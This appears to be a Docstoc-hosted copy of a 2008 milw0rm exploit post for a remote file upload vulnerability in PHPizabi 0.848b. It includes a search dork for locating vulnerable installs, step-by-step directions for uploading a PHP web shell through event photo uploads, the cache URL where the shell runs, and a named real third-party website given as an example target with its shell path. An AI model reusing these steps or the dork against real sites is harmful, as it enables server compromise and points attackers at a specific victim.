Docstoc

PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability

Document Sample
PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability Powered By Docstoc
					                           PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability                                 Page 1/2
  1    ############################################
  2    Powered by PHPizabi v0.848b C1 HFP1 remote file upload
  3
  4    author: ZoRLu
  5
  6    home: www.yildirimordulari.org
  7
  8    contact: trt−turk@hotmail.com
  9
  10   dork: "Powered by PHPizabi v0.848b C1 HFP1"
  11
  12   ############################################
  13
  14   exploit:
  15
  16   http://localhost/izabi/system/cache/pictures/id_shell.php
  17
  18   −first register web site
  19
  20   −Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create
       )
  21
  22   −event title and description write. show to select All the users. gözat button click and shell.php upload
  23
  24   −after go to event page. upload photo right click. open the menu click to properties. copy the url
  25
  26   example:
  27
  28   http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
  29
  30   and
  31
  32   exploit:
  33
  34   http://localhost/izabi/system/cache/pictures/xxx_shell.php
  35
  36   example web site:
  37
  38   http://bitchinindie.com/system/image.php?file=597_shell.php&width=500
  39
  40   exploit shell.php
  41
  42   http://bitchinindie.com/system/cache/pictures/597_shell.php
  43
  44
  45   ##################################################
  46
  47   thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasýrga(lav
       rens), avkidis, head_hunter
  48
  49   and all users yildirimordulari.org
  50

ZoRLu                                                                                                               02/17/2008
                        PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability                                     Page 2/2
  51   siircicocuk nerelerdesin be kanka msn e takýl özlettin kendini :)))
  52
  53   ## yildirimordulari.org açýlýr mý açýlmaz mý orasý bilinmez ama bilinen birþey var o bir efsane ##
  54
  55   #################################################
  56
  57   # milw0rm.com [2008−02−17]




ZoRLu                                                                                                                02/17/2008

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:7738
posted:5/24/2010
language:English
pages:2